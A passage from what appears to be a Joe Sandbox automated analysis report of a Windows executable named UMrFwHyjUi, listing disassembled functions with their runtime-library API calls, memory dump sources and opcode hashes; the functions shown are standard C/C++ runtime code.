                                                                                                                                                                                                                            • TryAcquireSRWLockExclusive.KERNEL32(00000003,00000000,00000000,?,00000002,?,001934CC,?,?), ref: 00198C7D
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 66001078-0
                                                                                                                                                                                                                            • Opcode ID: 485209c73d337b8a640c2a91fa4121b401742e423989856d115350b2d1ec86df
                                                                                                                                                                                                                            • Instruction ID: 535d241768c46b54efd244b359c64847758db79de94e223969ed2ac5d6192b5c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 485209c73d337b8a640c2a91fa4121b401742e423989856d115350b2d1ec86df
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2C412671902A06DBCF24DF65C8819AAB3F4FF1A350B504A2AE457D7A40EB34F984CB71
                                                                                                                                                                                                                            Function 001E6BC7 Relevance: 7.6, APIs: 5, Instructions: 109COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: __calloc_crt__init_pointers__initptd__mtterm
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3132042578-0
                                                                                                                                                                                                                            • Opcode ID: 0a94c54a7945867de6cfe35b03e58e96b0a908eff489fa3a921db52f6821de8f
                                                                                                                                                                                                                            • Instruction ID: a7b97b62f20c9aca1a033ec2ce92ae997ee49e6bc11f18e5ec099714d78d309a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0a94c54a7945867de6cfe35b03e58e96b0a908eff489fa3a921db52f6821de8f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 29319F31D487909ADB20AF76BC08A0E3FA5FF64761B90163AE454D35B1D774C840CF58
                                                                                                                                                                                                                            Function 001E1AD2 Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Name::operator+$NameName::
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 168861036-0
                                                                                                                                                                                                                            • Opcode ID: 07d7777d52dff5e113e7891794bf6f50c10d3f38d43dc9179de300c9a186e5fe
                                                                                                                                                                                                                            • Instruction ID: efc0062ec67be74f7b695d67ee8467ba220ec2a83a20cc48bb410eb408496932
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 07d7777d52dff5e113e7891794bf6f50c10d3f38d43dc9179de300c9a186e5fe
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 96019234A00649FFCF04EFA5D852EED7BB5EF54744F504095F901AB292DB70EA858B84
                                                                                                                                                                                                                            Function 001948F7 Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00194903
                                                                                                                                                                                                                            • int.LIBCPMT ref: 00194916
                                                                                                                                                                                                                              • Part of subcall function 00191830: std::_Lockit::_Lockit.LIBCPMT ref: 00191841
                                                                                                                                                                                                                              • Part of subcall function 00191830: std::_Lockit::~_Lockit.LIBCPMT ref: 0019185B
                                                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00194949
                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0019495F
                                                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 0019496A
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2081738530-0
                                                                                                                                                                                                                            • Opcode ID: 57992d4ff83cdfce424c1a832d8c8dd91261a50bac36fbe8236a9246cbf8c737
                                                                                                                                                                                                                            • Instruction ID: 660eace339ca85a11e2f3aca17ff163a8dcdc46ae34cfc40e49aa5366eac84a7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 57992d4ff83cdfce424c1a832d8c8dd91261a50bac36fbe8236a9246cbf8c737
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 73012632D10115BBCF28BB94E825C9F7B68EF95764B240108F91597291DF30AE43DBD0
                                                                                                                                                                                                                            Function 00194A2F Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00194A3B
                                                                                                                                                                                                                            • int.LIBCPMT ref: 00194A4E
                                                                                                                                                                                                                              • Part of subcall function 00191830: std::_Lockit::_Lockit.LIBCPMT ref: 00191841
                                                                                                                                                                                                                              • Part of subcall function 00191830: std::_Lockit::~_Lockit.LIBCPMT ref: 0019185B
                                                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00194A81
                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00194A97
                                                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00194AA2
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2081738530-0
                                                                                                                                                                                                                            • Opcode ID: 7768702195c56129276ec871c4142f8591bb6926fe5785aab73394fa0544e166
                                                                                                                                                                                                                            • Instruction ID: 99b5b33fb40c2ddd233a1461e99c74dc868882da7e4df62b65f16f494dac67cd
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7768702195c56129276ec871c4142f8591bb6926fe5785aab73394fa0544e166
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 84012636910115BBCF24ABA4E805C9E7768EF91360F250108F802A72A0EF70DE428780
                                                                                                                                                                                                                            Function 00194F6E Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00194F7A
                                                                                                                                                                                                                            • int.LIBCPMT ref: 00194F8D
                                                                                                                                                                                                                              • Part of subcall function 00191830: std::_Lockit::_Lockit.LIBCPMT ref: 00191841
                                                                                                                                                                                                                              • Part of subcall function 00191830: std::_Lockit::~_Lockit.LIBCPMT ref: 0019185B
                                                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00194FC0
                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00194FD6
                                                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00194FE1
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2081738530-0
                                                                                                                                                                                                                            • Opcode ID: 255f4cf08b0ef4445cb2dc9c6efbf3015198c7f8bd19c81de7081857add5e75a
                                                                                                                                                                                                                            • Instruction ID: cbfc883058d0d25b3001417605d62af499087d9ff52e465c93edc064462768e9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 255f4cf08b0ef4445cb2dc9c6efbf3015198c7f8bd19c81de7081857add5e75a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 85012632910115BBCF24AB98E805C9E7768EF91360B250109F911A7290EF30EE82C780
                                                                                                                                                                                                                            Function 001EA066 Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • __getptd.LIBCMT ref: 001EA072
                                                                                                                                                                                                                              • Part of subcall function 001E6A04: __getptd_noexit.LIBCMT ref: 001E6A07
                                                                                                                                                                                                                              • Part of subcall function 001E6A04: __amsg_exit.LIBCMT ref: 001E6A14
                                                                                                                                                                                                                            • __calloc_crt.LIBCMT ref: 001EA07D
                                                                                                                                                                                                                            • __lock.LIBCMT ref: 001EA0B3
                                                                                                                                                                                                                            • ___addlocaleref.LIBCMT ref: 001EA0BF
                                                                                                                                                                                                                            • __lock.LIBCMT ref: 001EA0D3
                                                                                                                                                                                                                              • Part of subcall function 001E5BA4: __getptd_noexit.LIBCMT ref: 001E5BA4
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__getptd
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2820776222-0
                                                                                                                                                                                                                            • Opcode ID: e1a2eccef77534c4c96ea4b3847fe8be0ad550a98ee4993f5fc2996ea686c99a
                                                                                                                                                                                                                            • Instruction ID: e907761943662193839eda50e024885fd0545ba731bb9de83e8e0ae8604ef8ca
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e1a2eccef77534c4c96ea4b3847fe8be0ad550a98ee4993f5fc2996ea686c99a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A501A231A40F41EFEB21BFB59803B0C7BA1AF64B60F60421EF4459B2D2CF745A418B56
                                                                                                                                                                                                                            Function 001987C2 Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 001987C9
                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 001987D4
                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00198842
                                                                                                                                                                                                                              • Part of subcall function 00198925: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0019893D
                                                                                                                                                                                                                            • std::locale::_Setgloballocale.LIBCPMT ref: 001987EF
                                                                                                                                                                                                                            • _Yarn.LIBCPMT ref: 00198805
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1088826258-0
                                                                                                                                                                                                                            • Opcode ID: 76e932dd4a9403f47bad38c61605c66790351fe0338337ccc997128d320824d3
                                                                                                                                                                                                                            • Instruction ID: e20684718c6eb2a98c4f6aab032cd5c4ef854166e2c7556479232e3003a279d6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 76e932dd4a9403f47bad38c61605c66790351fe0338337ccc997128d320824d3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 12017C76A002619BCF06EB64E85597C7BB1FFE6750B180149F80157391CF386E46CB92
                                                                                                                                                                                                                            Function 001E87C9 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • __getptd.LIBCMT ref: 001E87D5
                                                                                                                                                                                                                              • Part of subcall function 001E6A04: __getptd_noexit.LIBCMT ref: 001E6A07
                                                                                                                                                                                                                              • Part of subcall function 001E6A04: __amsg_exit.LIBCMT ref: 001E6A14
                                                                                                                                                                                                                            • __getptd.LIBCMT ref: 001E87EC
                                                                                                                                                                                                                            • __amsg_exit.LIBCMT ref: 001E87FA
                                                                                                                                                                                                                            • __lock.LIBCMT ref: 001E880A
                                                                                                                                                                                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 001E881E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 938513278-0
                                                                                                                                                                                                                            • Opcode ID: e5b528c2df55b90b8f95683bbe5c3f4538672bfb3054380b72a1938f3589f922
                                                                                                                                                                                                                            • Instruction ID: ac0549d2d2be80340526b87d65fcfd1754986cca44220913b646b0d7503403f8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e5b528c2df55b90b8f95683bbe5c3f4538672bfb3054380b72a1938f3589f922
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 83F09032D00B90DBE621FB6A5803B4D7390AF24761FA5412EF409A72E2CF645941CA59
                                                                                                                                                                                                                            Function 0019DB97 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,0019DB48,?,?,00000000,?,?,?,0019DC72,00000002,FlsGetValue,001B7CF0,FlsGetValue), ref: 0019DBA4
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,0019DB48,?,?,00000000,?,?,?,0019DC72,00000002,FlsGetValue,001B7CF0,FlsGetValue,?,?,0019CAB5), ref: 0019DBAE
                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 0019DBD6
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                                                            • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                            • Opcode ID: c7784d33fccf299011b0589b17dddfaa6fa6ee260690a63a5e8af79589c02694
                                                                                                                                                                                                                            • Instruction ID: c133234c4cb124ee3bb6ca03609e76eb7768d5bdcd4e9e21aa3547099170dd64
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c7784d33fccf299011b0589b17dddfaa6fa6ee260690a63a5e8af79589c02694
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C0E04F70284308B7EF202B62ED06F593F55AB11B50F150420F94EE98E1EB65E8949595
                                                                                                                                                                                                                            Function 001A9DB0 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetConsoleOutputCP.KERNEL32(AB531964,00000000,00000000,74DEF550), ref: 001A9E13
                                                                                                                                                                                                                              • Part of subcall function 001ACDFB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,001ACB79,?,00000000,-00000008), ref: 001ACEA7
                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 001AA06E
                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 001AA0B6
                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 001AA159
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2112829910-0
                                                                                                                                                                                                                            • Opcode ID: f82a87537b8027e7676200c750c1b61b831474968f170b13568869e79486f1ab
                                                                                                                                                                                                                            • Instruction ID: 80c44f9e7b3c098a654754e3b3f3022cad9a2736861c239906b449d63f08c166
